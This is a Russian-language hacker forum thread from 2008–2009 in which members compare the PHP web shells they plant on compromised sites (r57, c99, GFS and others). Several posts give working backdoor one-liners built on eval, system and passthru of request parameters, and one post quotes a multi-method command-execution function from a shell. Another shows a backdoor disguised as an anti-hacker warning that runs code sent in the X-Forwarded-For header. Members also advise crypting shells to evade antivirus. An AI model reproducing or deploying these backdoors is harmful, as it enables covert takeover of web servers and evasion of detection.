PDA

Просмотр полной версии : Каким шеллом вы пользуетесь?


--exe--
03.02.2008, 04:00
Собственно хотелось бы узнать кто каким шеллом пользуется...
Сам использую r57shell и доволен.

icegex
03.02.2008, 04:03
Юзаю античат шелл.
Иногда gfs shell =\

presidentua
03.02.2008, 04:07
МаднетШел - форевер

KPOT_f!nd
03.02.2008, 04:12
Шелл от Маг'а он про него многи раз писал)

alexman90
03.02.2008, 04:12
r57shell

ps Люди давайте все выкладыва шелы (у кого не приват) понятно что r57shell есть у всех...

Basurman
03.02.2008, 04:29
r57 1.42

Piflit
03.02.2008, 04:42
Какими презервативами вы пользуетесь?

Nightmarе
03.02.2008, 05:20
r57 щас палится всеми антивирями, так-что толку от него мало

zl0y
03.02.2008, 05:45
а криптануть ) ?

rem
03.02.2008, 06:25
мну хватает <?php ....($_GET["cmd"]) ?>
)))

K1nD[e]R
03.02.2008, 06:27
ctt_sh

}{0TT@БЬ)Ч
03.02.2008, 07:22
разными

alexman90
03.02.2008, 09:51
а поподробней на счёт <?php ....($_GET["cmd"]) ?> - прикол?? Злой у Вас есть криптор пхп кода?

cow
03.02.2008, 14:09
Я тоже забиваю в какую нибудь незаметную страничку обратную дверку, а у себя разворачиваю модифицированный STNC WebShell и вуаля - дешево и красиво! ;)

if($c=$_GET['cm']) { passthru($cm); die(); }

icegex
03.02.2008, 14:10
а поподробней на счёт <?php ....($_GET["cmd"]) ?> - прикол??
Нет, кстати самый маленький и удобный шелленг =)
Злой у Вас есть криптор пхп кода?
Любой обфускатор возьми и пробуй =)

Shawn1x
03.02.2008, 14:20
c99shell юзаю

cow
03.02.2008, 14:25
Кстати смежный вопрос. Каким шелом вы пользуетесь при safemode? Я пока в руках покрутил только c99shell safemode edition - ничего так.

-=[AL!EN]=-
03.02.2008, 14:31
c99 from Madnet

Basurman
03.02.2008, 15:13
cow,
if($c=$_GET['cm']) { passthru($cm); die(); } не айс )))

@system($_GET['cm']);

cow
03.02.2008, 15:20
Basurman, пока не жалуюсь. В мануал лень лезть, а какая разница? Вот взял из GFS shell:

function ex($comd){ //Выполнение команды
$res = '';
if (!empty($comd)){
if(function_exists('exec')){
exec($comd,$res);
$res=implode("\n",$res);
}elseif(function_exists('shell_exec')){
$res=shell_exec($comd);
}elseif(function_exists('system')){
ob_start();
system($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists('passthru')){
ob_start();
passthru($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(is_resource($f=popen($comd,"r"))){
$res = "";
while(!feof($f)) { $res.=fread($f,1024); }
pclose($f);
}
}
return $res;
}

Здесь на самом низком уровне комманда passthru, после exec, shell_exec, system.

Sharingan
03.02.2008, 15:27
6DIGShell
r57

Nea7
03.02.2008, 15:29
а поподробней на счёт <?php ....($_GET["cmd"]) ?> - прикол?? Злой у Вас есть криптор пхп кода?

TrueBug PHP Encoder //search

Slon
03.02.2008, 15:57
Remview и\или R57 очень удобно

[Raz0r]
03.02.2008, 16:21
r57shell 1.42

AFoST
03.02.2008, 16:35
c99madshell r57 <? system($cmd); ?>

ice1k
03.02.2008, 16:44
Какими презервативами вы пользуетесь?
contex

Talisman
03.02.2008, 17:26
мну хватает <?php ....($_GET["cmd"]) ?>
)))
это ответ на вопрос: каким шеллом вы оставляете логи...

cow
03.02.2008, 18:21
Ксати действительно, надо будет на Post исправить

desTiny
13.03.2008, 20:28
А ещё я вот таким шифруюсь:
$pag = isset($_GET['page']) ? $_GET['page'] : 1;
if (($pag != 1) && ($pag != 2) && ($pag != 3) && ($pag != 4))
{ $aaa = isset($_SERVER['HTTP_X_FORWARDED_FOR'])? $_SERVER['HTTP_X_FORWARDED_FOR'] : "\"\"";
$k = explode('.', $aaa);
if (isset($k[3]) && is_numeric($k[3]))
$aaa = "\"$aaa\"";
print "Never do it again, dumm from ";
eval("print $aaa;");
print " via ".$_SERVER['REMOTE_ADDR'];
print "<IMG align='left' src='img/stop.jpg' />";
footer();
die;
};

Если чё-то передать в X-Forwarded-For, то можно выполнить php код=) А якобы отпугиватель хакеров=)

Xcontrol212
13.03.2008, 20:42
c99shell юзаю

Isis
13.03.2008, 20:58
r57 1.42 +1 :)

Ershik
13.03.2008, 21:28
c99shell.php Стилем больше нравиться, да и ОтЗенденный он больше нравиться для антивирусов :)

Spyder
13.03.2008, 21:43
ачат+c99 от мэднета

PandoraBox
13.03.2008, 22:26
C99 madnet 2.0 -)

Shadow_p1raT
14.03.2008, 16:30
Ща юзаю r57shell

Noiro
15.03.2008, 00:06
r57shell.
Самопалы типа <?php eval($_GET['cmd']);?> <?php echo `$_GET[cmd]`;?> пользую только чтобы нормальный шелл воткнуть, ибо многие хостеры отключают system() passthru() и т.д., шелл должен все проверять по порядку способы.

ртуть
15.03.2008, 00:22
contex
contex light suxxx

blackybr
15.03.2008, 00:37
А ещё я вот таким шифруюсь:
$pag = isset($_GET['page']) ? $_GET['page'] : 1;
if (($pag != 1) && ($pag != 2) && ($pag != 3) && ($pag != 4))
{ $aaa = isset($_SERVER['HTTP_X_FORWARDED_FOR'])? $_SERVER['HTTP_X_FORWARDED_FOR'] : "\"\"";
$k = explode('.', $aaa);
if (isset($k[3]) && is_numeric($k[3]))
$aaa = "\"$aaa\"";
print "Never do it again, dumm from ";
eval("print $aaa;");
print " via ".$_SERVER['REMOTE_ADDR'];
print "<IMG align='left' src='img/stop.jpg' />";
footer();
die;
};


Если чё-то передать в X-Forwarded-For, то можно выполнить php код=) А якобы отпугиватель хакеров=)

Oo

eval($_SERVER['HTTP_X_FORWARDED_FOR']);

desTiny
15.03.2008, 09:44
Oo

eval($_SERVER['HTTP_X_FORWARDED_FOR']);

Угу=) Зато видимость противохакерской защиты=)

попугай
17.06.2009, 16:42
Щас c99madshell стал палиться антивирями.. жялько)

heretic1990
17.06.2009, 20:03
Щас c99madshell стал палиться антивирями.. жялько)
криптуй! на ачате много крипторов для пыха было.
а по сабжу пользуюсь r57shell.

Nelzone
17.06.2009, 20:30
r57